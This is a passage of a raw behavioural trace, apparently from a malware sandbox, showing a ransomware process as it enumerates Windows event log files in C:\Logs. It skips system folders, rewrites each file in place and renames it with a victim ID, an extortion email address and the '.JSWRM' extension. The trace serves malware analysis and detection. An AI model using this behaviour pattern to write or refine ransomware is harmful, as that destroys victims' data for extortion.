(lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="windows") returned -1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="recovery") returned -1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="perflogs") returned -1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="system volume information") returned -1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="msocache") returned -1 [0065.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0065.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-LiveId%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0065.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-LiveId%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x1f8328, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-LiveId%4Operational.evtx", lpUsedDefaultChar=0x0) returned 42 [0065.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0065.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0065.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-LiveId%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0065.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-LiveId%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x1f84e8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-LiveId%4Operational.evtx", lpUsedDefaultChar=0x0) returned 42 [0065.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0065.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0065.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0065.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0065.853] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.853] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.853] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.853] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.859] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.859] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.859] CloseHandle (hObject=0x450) returned 1 [0065.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0065.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0065.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0065.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0065.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0065.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0065.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0065.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0065.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.862] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0065.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0065.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0065.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.862] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Admin.evtx", cAlternateFileName="MI30D3~1.EVT")) returned 1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2=".") returned 1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="..") returned 1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="...") returned 1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="windows") returned -1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="recovery") returned -1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="perflogs") returned -1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="system volume information") returned -1 [0065.862] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="msocache") returned -1 [0065.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0065.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-MUI%4Admin.evtx", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0065.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-MUI%4Admin.evtx", cchWideChar=33, lpMultiByteStr=0x1f87c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-MUI%4Admin.evtx", lpUsedDefaultChar=0x0) returned 33 [0065.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0065.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0065.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-MUI%4Admin.evtx", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0065.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-MUI%4Admin.evtx", cchWideChar=33, lpMultiByteStr=0x1f8638, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-MUI%4Admin.evtx", lpUsedDefaultChar=0x0) returned 33 [0065.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0065.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0065.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0065.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0065.863] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.863] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.863] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.863] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.888] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.888] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.889] CloseHandle (hObject=0x450) returned 1 [0065.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0065.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0065.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0065.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0065.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0065.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0065.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0065.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.891] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0065.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0065.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.891] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Operational.evtx", cAlternateFileName="MI6F01~1.EVT")) returned 1 [0065.891] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2=".") returned 1 [0065.891] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="..") returned 1 [0065.891] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="...") returned 1 [0065.891] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="windows") returned -1 [0065.891] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="recovery") returned -1 [0065.892] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="perflogs") returned -1 [0065.892] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.892] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.892] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="system volume information") returned -1 [0065.892] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="msocache") returned -1 [0065.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0065.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-MUI%4Operational.evtx", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0065.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-MUI%4Operational.evtx", cchWideChar=39, lpMultiByteStr=0x1f8328, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-MUI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 39 [0065.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0065.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0065.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-MUI%4Operational.evtx", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0065.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-MUI%4Operational.evtx", cchWideChar=39, lpMultiByteStr=0x1f84e8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-MUI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 39 [0065.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0065.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0065.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0065.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0065.892] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.892] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.892] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.892] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.899] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.899] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.900] CloseHandle (hObject=0x450) returned 1 [0065.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0065.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0065.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0065.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0065.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0065.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0065.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0065.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0065.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.903] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0065.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0065.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0065.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.903] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, 